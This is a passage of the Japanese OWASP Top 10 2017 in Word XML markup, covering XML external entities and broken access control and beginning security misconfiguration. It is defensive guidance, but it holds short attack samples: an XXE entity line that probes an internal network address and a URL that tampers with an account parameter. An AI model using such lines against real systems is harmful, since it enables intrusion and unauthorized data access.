    <w:bookmarkStart w:id="170" w:name="a42017-xml-外部エンティティ参照-xxe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A4:2017-XML 外部エンティティ参照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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 2 : 検出のしやすさ 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 3 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>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tcPr/>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55">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">SAST</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ツールで依存関係と構成を調べることでこの問題を発見できます。</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId80">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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">これらの欠陥は、その他の攻撃と同様に、データの抽出、サーバからのリモート要求の実行、内部システムのスキャン、サービス不能攻撃の実行に使用できます。ビジネス面への影響の大きさは、この影響を受けるアプリケーションとデータを保護する必要がどれほどあるかにかかっています。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="157" w:name="脆弱性発見のポイント-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーション、特にXMLベースのWebサービスやダウンストリーム統合が下記の条件を満たす場合、脆弱である可能性があります:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションまたはSOAPベースのWebサービスのXMLプロセッサにおいて、</w:t>
      </w:r>
      <w:hyperlink r:id="rId155">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ドキュメントタイプ定義（DTD）</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">が有効になっている。なお、DTD処理を無効にする実際のメカニズムはXMLプロセッサによって異なるため、</w:t>
      </w:r>
      <w:hyperlink r:id="rId156">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet 'XXE Prevention'</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">などの資料を参考にすると良い。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションがバージョン1.2より前のSOAPを使用する。XMLエンティティがSOAPフレームワークに渡されていると、XXE攻撃の影響を受けやすくなる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XXE攻撃に対して脆弱であるということは、アプリケーションがBillion Laughs攻撃(XML爆弾を使う攻撃)のようなDoS攻撃に脆弱であるということと、ほぼ同義である。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="157"/>
    <w:bookmarkStart w:id="158" w:name="防止方法-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">防止方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">開発者のトレーニングは、XXEを特定し、軽減するために不可欠です。加えて、XXEを防ぐには以下のことが不可欠です:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">可能な限り、JSONなどの複雑さの低いデータ形式を使用し、機微なデータのシリアライズを避ける。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId156">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet 'XXE Prevention'</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">に従い、アプリケーション内のすべてのXMLパーサーでXML外部エンティティとDTD処理を無効にする。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ホワイトリスト方式によるサーバーサイドの入力検証や、XMLドキュメント、ヘッダ、ノード内の悪意のあるデータのフィルタリング、またはサニタイズを実装する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XMLまたはXSLファイルのアップロード機能において、XSD検証などを使用して受信するXMLを検証していることを確認する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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bookmarkEnd w:id="158"/>
    <w:bookmarkStart w:id="159" w:name="攻撃シナリオの例-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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Cs/>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シナリオ #2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 攻撃者は、上記のENTITY行を次のように変更して、サーバのプライベートネットワークを調べようとします:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   &lt;!ENTITY xxe SYSTEM "https://192.168.1.1/private" &gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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bookmarkEnd w:id="159"/>
    <w:bookmarkStart w:id="169" w:name="参考資料-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="163" w:name="owasp-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId111">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Application Security Verification Standard</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId160">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Testing for XML Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId161">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP XXE Vulnerability</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId156">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: XXE Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId162">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: XML Security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="163"/>
    <w:bookmarkStart w:id="168" w:name="外部資料-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId164">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-611: Improper Restriction of XXE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId165">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Billion Laughs Attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId166">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SAML Security XML External Entity Attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId167">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Detecting and exploiting XXE in SAML Interfaces</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="168"/>
    <w:bookmarkEnd w:id="169"/>
    <w:bookmarkEnd w:id="170"/>
    <w:bookmarkStart w:id="186" w:name="a52017-アクセス制御の不備"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A5:2017-アクセス制御の不備</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 2 : 検出のしやすさ 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 3 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">アクセス制御の悪用は攻撃者の基本スキルです。 静的ソースコード解析ツール(</w:t>
            </w:r>
            <w:hyperlink r:id="rId55">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">SAST</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)と動的アプリケーションテストツール(</w:t>
            </w:r>
            <w:hyperlink r:id="rId80">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tcPr/>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tcPr/>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bookmarkStart w:id="171" w:name="脆弱性発見のポイント-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL、内部のアプリケーションの状態、HTMLページを変更することやカスタムAPI攻撃ツールを単純に使用することによって、アクセス制御のチェックを迂回できてしまう。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">主キーを他のユーザのレコードに変更することができ、他のユーザのアカウントを表示または編集できてしまう。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">権限昇格。ログインすることなしにユーザとして行動したり、一般ユーザとしてログインした時に管理者として行動できてしまう。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">メタデータの操作。JSON Web Token（JWT）アクセス制御トークンや権限昇格するために操作されるCookieやhiddenフィールドを再生成または改ざんできたり、JWTの無効化を悪用できるなど。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CORSの誤設定によって権限のないAPIアクセスが許可されてしまう。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">認証されていないユーザを要認証ページへ、一般ユーザを要権限ページへ強制ブラウズできてしまう。 POST、PUT、DELETEメソッドへのアクセス制御がないAPIへアクセスができてしまう。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="171"/>
    <w:bookmarkStart w:id="172" w:name="防止方法-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">公開リソースへのアクセスを除いて、アクセスを原則として拒否する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CORSの使用を最小限に抑えるように、アクセス制御メカニズムを一度実装し、アプリケーション全体で再利用する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アクセス制御モデルは、ユーザがどのようなレコードでも作成、読取、更新、または削除できるようにするのではなく、レコードの所有権があることを前提としなければならない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーション独自のビジネス上の制約要求はドメインモデルに表現される必要がある。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webサーバーのディレクトリリスティングを無効にし、ファイルのメタデータ（.gitなど）とバックアップファイルがウェブルートに存在しないことを確認する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アクセス制御の失敗をログに記録し、必要に応じて管理者に警告する（繰返して失敗しているなど）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">レート制限するAPIとコントローラは自動攻撃ツールによる被害を最小限に抑えるための手段である。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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bookmarkEnd w:id="172"/>
    <w:bookmarkStart w:id="173" w:name="攻撃シナリオの例-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻撃シナリオの例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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https://example.com/app/accountInfo?acct=notmyacct</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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認証されていないユーザがこれらのページにアクセスすることができるなら、欠陥があります。管理者でない人が管理者のページにアクセスできるなら、それも欠陥です。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="173"/>
    <w:bookmarkStart w:id="185" w:name="参考資料-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="178" w:name="owasp-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId174">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Proactive Controls: Access Controls</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId175">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Application Security Verification Standard: V4 Access Control</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId176">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Authorization Testing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId177">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Access Control</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="178"/>
    <w:bookmarkStart w:id="184" w:name="外部資料-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId179">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId180">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-284: Improper Access Control (Authorization)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId181">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-285: Improper Authorization</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId182">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-639: Authorization Bypass Through User-Controlled Key</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId183">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger: Exploiting CORS misconfiguration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="184"/>
    <w:bookmarkEnd w:id="185"/>
    <w:bookmarkEnd w:id="186"/>
    <w:bookmarkStart w:id="202" w:name="a62017-不適切なセキュリティ設定"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A6:2017-不適切なセキュリティ設定</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 3 : 検出のしやすさ 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 2 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>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tcPr/>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tcPr/>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bookmarkStart w:id="187" w:name="脆弱性発見のポイント-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションが下記のようなら、恐らく脆弱です。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションスタックのいずれかの部分におけるセキュリティ堅牢化の不足、あるいはクラウドサービスでパーミッションが不適切に設定されている。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">必要のない機能が有効、あるいはインストールされている(例えば、必要のないポートやサービス、ページ、アカウント、特権)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">デフォルトのアカウントとパスワードが有効になったまま変更されていない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">エラー処理がユーザに対して、スタックトレースやその他余計な情報を含むエラーメッセージを見せる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アップグレードしたシステムでは、最新のセキュリティ機能が無効になっているか正しく設定されていない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションサーバやアプリケーションフレームワーク(例えば、Struts、Spring、 ASP.NET)、ライブラリ、データベース等のセキュリティの設定が、安全な値に設定されていない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
